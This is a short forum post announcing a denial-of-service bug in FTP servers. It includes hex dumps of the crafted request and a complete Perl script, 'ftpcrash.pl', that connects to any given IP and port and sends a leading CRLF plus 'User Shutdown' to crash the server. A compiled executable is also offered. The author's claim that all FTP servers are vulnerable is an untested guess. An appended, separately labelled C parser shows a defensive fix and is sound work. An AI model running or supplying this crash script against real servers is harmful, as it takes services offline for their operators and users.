I have found a very serious hole in FTP servers.
The exploit is tested on Cerberus FTP Server 1.71 and on one I coded myself, but I think all FTP servers are vulnerable.
Sorry, but I have too few FTP servers to test.
And this is how it works.
Typical request:
00000000 55 73 65 72 20 53 68 75 74 64 6f 77 6e 0d 0a    User Shutdown..
Exploit request:
00000000 0d 0a 55 73 65 72 20 53 68 75 74 64 6f 77 6e    ..User Shutdown
I've coded an exploit.
See attached file: ftpcrash.exe (zipped) for people who have no Perl.
My exploit (in Perl):
[code]
# ftpcrash.pl
print "Exploit for FTP-Server\n";
print " by The real Remoter\n";
my $usage = "\nftpcrash <IP> <Port>\n";
die "$usage" unless $ARGV[0] && $ARGV[1];
use Socket;
my $remote = $ARGV[0];
my $port = $ARGV[1];
my $iaddr = inet_aton($remote);
my $proto = getprotobyname("tcp");
my $paddr = sockaddr_in($port, $iaddr);
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK, $paddr) or die "Can't connect to " . $remote;
print "Sending exploit\n";
$msg = "\x0d\x0a";
$msg = $msg . "User Shutdown";
send(SOCK, $msg, 0) or die "Can't send Exploit";
sleep(1);
print "Server Crashed!";
sleep(1);
exit;
[/code]
Sorry for my bad English (I'm German).
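
The post does not say why the servers crash. As an added example (not part of the original post and not any server's actual code), here is a control-channel line reader in C that handles both byte sequences shown above: a leading bare CRLF is skipped, and a command with no line terminator stays buffered until more data arrives. The names `next_command`, `consume`, `MAX_LINE` and the return codes are hypothetical.

```c
#include <ctype.h>
#include <string.h>

#define MAX_LINE 512 /* assumed per-command limit; not taken from the post */
enum { TOO_LONG = -1, NEED_MORE = 0, GOT_COMMAND = 1 };

/* Drop the first n bytes of buf and shift the remainder down. */
static void consume(char *buf, size_t *len, size_t n)
{
    memmove(buf, buf + n, *len - n);
    *len -= n;
}

/* Take the next non-empty line out of buf[0..*len). Empty lines are skipped;
 * an unterminated tail is left in place until more bytes arrive.
 * vsz and asz must be at least 1. */
int next_command(char *buf, size_t *len, char *verb, size_t vsz,
                 char *arg, size_t asz)
{
    for (;;) {
        char *lf = memchr(buf, '\n', *len);
        if (lf == NULL)
            return *len >= MAX_LINE ? TOO_LONG : NEED_MORE;
        size_t raw = (size_t)(lf - buf) + 1; /* line length including LF */
        size_t n = raw - 1, i = 0, v = 0, a = 0;
        if (n > 0 && buf[n - 1] == '\r')
            n--;                             /* strip the CR of CRLF */
        if (n >= MAX_LINE)
            return TOO_LONG;                 /* caller should close the session */
        if (n == 0) {                        /* bare CRLF: ignore, keep looping */
            consume(buf, len, raw);
            continue;
        }
        for (; i < n && buf[i] != ' '; i++)  /* command word, upper-cased */
            if (v + 1 < vsz)
                verb[v++] = (char)toupper((unsigned char)buf[i]);
        verb[v] = '\0';
        while (i < n && buf[i] == ' ')
            i++;
        while (i < n && a + 1 < asz)         /* argument, truncated to fit */
            arg[a++] = buf[i++];
        arg[a] = '\0';
        consume(buf, len, raw);
        return GOT_COMMAND;
    }
}
```

A caller would append received bytes to `buf`, call `next_command` in a loop until it returns `NEED_MORE`, and answer an empty or unknown `verb` with a 500 reply.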